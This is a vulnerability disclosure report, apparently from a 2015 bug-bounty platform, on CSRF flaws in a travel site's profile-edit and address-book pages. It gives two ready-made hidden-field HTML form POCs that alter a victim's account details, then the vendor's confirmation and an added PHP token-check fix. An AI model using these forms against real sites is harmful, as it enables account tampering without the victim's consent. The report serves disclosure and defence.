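2015-09-06: Details reported to the vendor; awaiting vendor handling
2015-09-06: Vendor confirmed; details disclosed to the vendor only
2015-09-16: Details disclosed to core white hats and experts in related fields
2015-09-26: Details disclosed to regular white hats
2015-10-06: Details disclosed to trainee white hats
2015-10-21: Details disclosed to the public
As the title says.
I. Basic profile information
1. URL: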
https://cn.toursforfun.com/account_edit.php#my-information
2. Capture the request while editing the profile and generate a POC
POC:
<html>
  <body>
    <form action="https://cn.toursforfun.com/account_edit.php" method="POST">
      <input type="hidden" name="sur_name" value="test123" />
      <input type="hidden" name="given_name" value="Given name" />
      <input type="hidden" name="chinese_name" value="test123" />
      <input type="hidden" name="email" value="test0123@qq.com" />
      <input type="hidden" name="country_code" value="" />
      <input type="hidden" name="cell" value="" />
      <input type="hidden" name="country_id" value="243" />
      <input type="hidden" name="zone_id" value="322" />
      <input type="hidden" name="city" value="" />
      <input type="hidden" name="state" value="" />
      <input type="hidden" name="street_address" value="" />
      <input type="hidden" name="zip" value="" />
      <input type="hidden" name="sex" value="m" />
      <input type="hidden" name="dob" value="0000-00-00" />
      <input type="hidden" name="birthday_secret_type" value="0" />
      <input type="hidden" name="other_phone" value="" />
      <input type="hidden" name="submit" value="保存信息" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
3. Before clicking the POC
4. After clicking the POC
II. Shipping address hijacking: going straight to the POC
1. URL:
http://cn.toursforfun.com/address_book.php?action=add
POC
<html>
  <body>
    <form action="http://cn.toursforfun.com/address_book.php?action=add" method="POST">
      <input type="hidden" name="description" value="test" />
      <input type="hidden" name="type" value="0" />
      <input type="hidden" name="first_name" value="test" />
      <input type="hidden" name="last_name" value="test" />
      <input type="hidden" name="chinese_name" value="test" />
      <input type="hidden" name="email_address" value="test1234@qq.com" />
      <input type="hidden" name="cellphone" value="132873876" />
      <input type="hidden" name="country_id" value="223" />
      <input type="hidden" name="zone_id" value="" />
      <input type="hidden" name="city" value="" />
      <input type="hidden" name="state" value="New York" />
      <input type="hidden" name="street_address" value="test" />
      <input type="hidden" name="zip" value="010000" />
      <input type="hidden" name="other_phone" value="" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="submit" value="保存" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
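2. I verified that this works, but couldn't be bothered to take screenshots.
Severity: Low
Vulnerability Rank: 2
Confirmed at: 2015-09-06 13:41
Confirmed that the vulnerability exists. Next time, please HTML-decode the value fields of the CSRF POC before submitting. Thank you.
None yet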
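Both forms in this report are accepted because every field in them is a value a third-party page can predict. The block below is an added example, not part of the original report and not the vendor's code: a synchronizer-token check for state-changing POST handlers, written in PHP because the affected endpoints are PHP. The function names, the `csrf_token` field name and the `ALLOWED_ORIGINS` list are assumptions, and the cookie options require PHP 7.3 or later.

```php
<?php
// Added example: hypothetical helpers, not the vendor's code.

const ALLOWED_ORIGINS = ['https://cn.toursforfun.com']; // assumption: the site's only origin

function csrf_start_session(): void
{
    // SameSite=Lax keeps the session cookie off cross-site POSTs (PHP >= 7.3).
    session_set_cookie_params(['secure' => true, 'httponly' => true, 'samesite' => 'Lax']);
    session_start();
    if (empty($_SESSION['csrf_token'])) {
        // 256 bits from the CSPRNG, bound to this session only.
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
}

function csrf_field(): string
{
    // Emit inside every form that changes state (profile edit, address add).
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES, 'UTF-8') . '" />';
}

function csrf_origin_ok(array $server): bool
{
    // Reject a foreign Origin outright; if the header is absent, the token decides.
    if (!isset($server['HTTP_ORIGIN'])) {
        return true;
    }
    return in_array($server['HTTP_ORIGIN'], ALLOWED_ORIGINS, true);
}

function csrf_verify(array $post, array $server, array $session): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST' || !csrf_origin_ok($server)) {
        return false;
    }
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // Constant-time comparison; an empty or missing session token never matches.
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent);
}

// At the top of a handler such as account_edit.php or address_book.php:
csrf_start_session();
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && !csrf_verify($_POST, $_SERVER, $_SESSION)) {
    http_response_code(403);
    exit('Invalid or missing CSRF token');
}
```

With this check in place, a form that carries only the fields listed in the two POCs is answered with 403, because it has no `csrf_token` matching the victim's session.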